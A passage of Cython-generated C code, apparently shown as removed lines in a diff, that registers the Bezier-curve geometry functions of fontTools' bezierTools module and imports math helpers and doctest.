__Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":613 - * - * - * def splitCubicAtT(pt1, pt2, pt3, pt4, *ts): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at one or more values of t. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_33splitCubicAtT, 0, __pyx_n_s_splitCubicAtT_2, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__45)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 613, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitCubicAtT_2, __pyx_t_2) < 0) __PYX_ERR(0, 613, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":637 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * pt1=cython.complex, - * pt2=cython.complex, - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_35splitCubicAtTC, 0, __pyx_n_s_splitCubicAtTC, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj_)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 637, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitCubicAtTC, __pyx_t_2) < 0) __PYX_ERR(0, 637, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":661 - * - * - * @cython.returns(cython.complex) # <<<<<<<<<<<<<< - * @cython.locals( - * t=cython.double, - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_38splitCubicIntoTwoAtTC, 0, __pyx_n_s_splitCubicIntoTwoAtTC, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__47)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 661, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitCubicIntoTwoAtTC, __pyx_t_2) < 0) __PYX_ERR(0, 661, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":701 - * - * - * def _splitQuadraticAtT(a, b, c, *ts): # <<<<<<<<<<<<<< - * ts = list(ts) - * segments = [] - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_40_splitQuadraticAtT, 0, __pyx_n_s_splitQuadraticAtT, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__49)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 701, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitQuadraticAtT, __pyx_t_2) < 0) __PYX_ERR(0, 701, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":728 - * - * - * def _splitCubicAtT(a, b, c, d, *ts): # <<<<<<<<<<<<<< - * ts = list(ts) - * ts.insert(0, 0.0) - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_42_splitCubicAtT, 0, __pyx_n_s_splitCubicAtT, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__51)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 728, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitCubicAtT, __pyx_t_2) < 0) __PYX_ERR(0, 728, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":763 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * a=cython.complex, - * b=cython.complex, - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_44_splitCubicAtTC, 0, __pyx_n_s_splitCubicAtTC_2, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__3)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 763, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitCubicAtTC_2, __pyx_t_2) < 0) __PYX_ERR(0, 763, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":805 - * # - * - * from math import sqrt, acos, cos, pi # <<<<<<<<<<<<<< - * - * - */ - __pyx_t_2 = PyList_New(4); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_n_s_sqrt); - __Pyx_GIVEREF(__pyx_n_s_sqrt); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_n_s_sqrt)) __PYX_ERR(0, 805, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_s_acos); - __Pyx_GIVEREF(__pyx_n_s_acos); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 1, __pyx_n_s_acos)) __PYX_ERR(0, 805, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_s_cos); - __Pyx_GIVEREF(__pyx_n_s_cos); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 2, __pyx_n_s_cos)) __PYX_ERR(0, 805, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_s_pi); - __Pyx_GIVEREF(__pyx_n_s_pi); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 3, __pyx_n_s_pi)) __PYX_ERR(0, 805, __pyx_L1_error); - __pyx_t_3 = __Pyx_Import(__pyx_n_s_math, __pyx_t_2, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_sqrt); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_sqrt, __pyx_t_2) < 0) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_acos); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_acos, __pyx_t_2) < 0) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_cos); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_cos, __pyx_t_2) < 0) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_pi); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_pi, __pyx_t_2) < 0) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":808 - * - * - * def solveQuadratic(a, b, c, sqrt=sqrt): # <<<<<<<<<<<<<< - * """Solve a quadratic equation. - * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_47solveQuadratic, 0, __pyx_n_s_solveQuadratic, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__54)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 808, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (!__Pyx_CyFunction_InitDefaults(__pyx_t_3, sizeof(__pyx_defaults), 1)) __PYX_ERR(0, 808, __pyx_L1_error) - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_sqrt); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 808, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_CyFunction_Defaults(__pyx_defaults, __pyx_t_3)->__pyx_arg_sqrt = __pyx_t_2; - __Pyx_GIVEREF(__pyx_t_2); - __pyx_t_2 = 0; - __Pyx_CyFunction_SetDefaultsGetter(__pyx_t_3, __pyx_pf_9fontTools_4misc_11bezierTools_94__defaults__); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_solveQuadratic, __pyx_t_3) < 0) __PYX_ERR(0, 808, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":841 - * - * - * def solveCubic(a, b, c, d): # <<<<<<<<<<<<<< - * """Solve a cubic equation. - * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_49solveCubic, 0, __pyx_n_s_solveCubic, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__56)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 841, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_solveCubic, __pyx_t_3) < 0) __PYX_ERR(0, 841, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":938 - * - * - * def calcQuadraticParameters(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * x2, y2 = pt2 - * x3, y3 = pt3 - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_51calcQuadraticParameters, 0, __pyx_n_s_calcQuadraticParameters, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__58)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 938, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcQuadraticParameters, __pyx_t_3) < 0) __PYX_ERR(0, 938, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":949 - * - * - * def calcCubicParameters(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * x2, y2 = pt2 - * x3, y3 = pt3 - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_53calcCubicParameters, 0, __pyx_n_s_calcCubicParameters, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__60)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 949, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcCubicParameters, __pyx_t_3) < 0) __PYX_ERR(0, 949, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":981 - * - * - * def calcQuadraticPoints(a, b, c): # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_55calcQuadraticPoints, 0, __pyx_n_s_calcQuadraticPoints, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__62)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 981, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcQuadraticPoints, __pyx_t_3) < 0) __PYX_ERR(0, 981, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":994 - * - * - * def calcCubicPoints(a, b, c, d): # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_57calcCubicPoints, 0, __pyx_n_s_calcCubicPoints, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__64)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 994, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcCubicPoints, __pyx_t_3) < 0) __PYX_ERR(0, 994, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1033 - * - * - * def linePointAtT(pt1, pt2, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a line. - * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_59linePointAtT, 0, __pyx_n_s_linePointAtT, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__66)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1033, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_linePointAtT, __pyx_t_3) < 0) __PYX_ERR(0, 1033, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1046 - * - * - * def quadraticPointAtT(pt1, pt2, pt3, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a quadratic curve. - * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_61quadraticPointAtT, 0, __pyx_n_s_quadraticPointAtT, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__68)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1046, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_quadraticPointAtT, __pyx_t_3) < 0) __PYX_ERR(0, 1046, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1061 - * - * - * def cubicPointAtT(pt1, pt2, pt3, pt4, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a cubic curve. - * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_63cubicPointAtT, 0, __pyx_n_s_cubicPointAtT, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__70)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1061, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_cubicPointAtT, __pyx_t_3) < 0) __PYX_ERR(0, 1061, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1087 - * - * - * @cython.returns(cython.complex) # <<<<<<<<<<<<<< - * @cython.locals( - * t=cython.double, - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_65cubicPointAtTC, 0, __pyx_n_s_cubicPointAtTC, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__72)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1087, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_cubicPointAtTC, __pyx_t_3) < 0) __PYX_ERR(0, 1087, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1112 - * - * - * def segmentPointAtT(seg, t): # <<<<<<<<<<<<<< - * if len(seg) == 2: - * return linePointAtT(*seg, t) - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_67segmentPointAtT, 0, __pyx_n_s_segmentPointAtT, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__74)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1112, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_segmentPointAtT, __pyx_t_3) < 0) __PYX_ERR(0, 1112, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1127 - * - * - * def _line_t_of_pt(s, e, pt): # <<<<<<<<<<<<<< - * sx, sy = s - * ex, ey = e - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_69_line_t_of_pt, 0, __pyx_n_s_line_t_of_pt, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__76)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1127, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_line_t_of_pt, __pyx_t_3) < 0) __PYX_ERR(0, 1127, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1141 - * - * - * def _both_points_are_on_same_side_of_origin(a, b, origin): # <<<<<<<<<<<<<< - * xDiff = (a[0] - origin[0]) * (b[0] - origin[0]) - * yDiff = (a[1] - origin[1]) * (b[1] - origin[1]) - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_71_both_points_are_on_same_side_of_origin, 0, __pyx_n_s_both_points_are_on_same_side_of, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__78)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1141, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_both_points_are_on_same_side_of, __pyx_t_3) < 0) __PYX_ERR(0, 1141, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1147 - * - * - * def lineLineIntersections(s1, e1, s2, e2): # <<<<<<<<<<<<<< - * """Finds intersections between two line segments. - * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_73lineLineIntersections, 0, __pyx_n_s_lineLineIntersections, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__80)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1147, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_lineLineIntersections, __pyx_t_3) < 0) __PYX_ERR(0, 1147, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1225 - * - * - * def _alignment_transformation(segment): # <<<<<<<<<<<<<< - * # Returns a transformation which aligns a segment horizontally at the - * # origin. Apply this transformation to curves and root-find to find - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_75_alignment_transformation, 0, __pyx_n_s_alignment_transformation, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__82)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1225, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_alignment_transformation, __pyx_t_3) < 0) __PYX_ERR(0, 1225, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1235 - * - * - * def _curve_line_intersections_t(curve, line): # <<<<<<<<<<<<<< - * aligned_curve = _alignment_transformation(line).transformPoints(curve) - * if len(curve) == 3: - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_77_curve_line_intersections_t, 0, __pyx_n_s_curve_line_intersections_t, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__84)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1235, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_curve_line_intersections_t, __pyx_t_3) < 0) __PYX_ERR(0, 1235, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1248 - * - * - * def curveLineIntersections(curve, line): # <<<<<<<<<<<<<< - * """Finds intersections between a curve and a line. - * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_79curveLineIntersections, 0, __pyx_n_s_curveLineIntersections, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__86)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1248, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_curveLineIntersections, __pyx_t_3) < 0) __PYX_ERR(0, 1248, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1286 - * - * - * def _curve_bounds(c): # <<<<<<<<<<<<<< - * if len(c) == 3: - * return calcQuadraticBounds(*c) - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_81_curve_bounds, 0, __pyx_n_s_curve_bounds, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__88)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1286, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_curve_bounds, __pyx_t_3) < 0) __PYX_ERR(0, 1286, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1294 - * - * - * def _split_segment_at_t(c, t): # <<<<<<<<<<<<<< - * if len(c) == 2: - * s, e = c - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_83_split_segment_at_t, 0, __pyx_n_s_split_segment_at_t, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__90)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1294, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_split_segment_at_t, __pyx_t_3) < 0) __PYX_ERR(0, 1294, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1306 - * - * - * def _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * curve1, curve2, precision=1e-3, range1=None, range2=None - * ): - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_85_curve_curve_intersections_t, 0, __pyx_n_s_curve_curve_intersections_t, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__93)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1306, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_3, __pyx_tuple__94); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_curve_curve_intersections_t, __pyx_t_3) < 0) __PYX_ERR(0, 1306, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1373 - * - * - * def curveCurveIntersections(curve1, curve2): # <<<<<<<<<<<<<< - * """Finds intersections between a curve and a curve. - * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_87curveCurveIntersections, 0, __pyx_n_s_curveCurveIntersections, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__96)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1373, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_curveCurveIntersections, __pyx_t_3) < 0) __PYX_ERR(0, 1373, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1401 - * - * - * def segmentSegmentIntersections(seg1, seg2): # <<<<<<<<<<<<<< - * """Finds intersections between two segments. - * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_89segmentSegmentIntersections, 0, __pyx_n_s_segmentSegmentIntersections, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__98)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1401, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_segmentSegmentIntersections, __pyx_t_3) < 0) __PYX_ERR(0, 1401, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1449 - * - * - * def _segmentrepr(obj): # <<<<<<<<<<<<<< - * """ - * >>> _segmentrepr([1, [2, 3], [], [[2, [3, 4], [0.1, 2.2]]]]) - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_91_segmentrepr, 0, __pyx_n_s_segmentrepr, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__100)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1449, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_segmentrepr, __pyx_t_3) < 0) __PYX_ERR(0, 1449, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1462 - * - * - * def printSegments(segments): # <<<<<<<<<<<<<< - * """Helper for the doctests, displaying each segment in a list of - * segments on a single line as a tuple. - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_93printSegments, 0, __pyx_n_s_printSegments, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__102)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1462, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_printSegments, __pyx_t_3) < 0) __PYX_ERR(0, 1462, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1470 - * - * - * if __name__ == "__main__": # <<<<<<<<<<<<<< - * import sys - * import doctest - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_name); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1470, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_10 = (__Pyx_PyUnicode_Equals(__pyx_t_3, __pyx_n_u_main, Py_EQ)); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 1470, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_10) { - - /* "fontTools/misc/bezierTools.py":1471 - * - * if __name__ == "__main__": - * import sys # <<<<<<<<<<<<<< - * import doctest - * - */ - __pyx_t_3 = __Pyx_ImportDottedModule(__pyx_n_s_sys, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1471, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_sys, __pyx_t_3) < 0) __PYX_ERR(0, 1471, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1472 - * if __name__ == "__main__": - * import sys - * import doctest # <<<<<<<<<<<<<< - * - * sys.exit(doctest.testmod().failed) - */ - __pyx_t_3 = __Pyx_ImportDottedModule(__pyx_n_s_doctest, NULL); if (unlikely(!__pyx_t_3)) 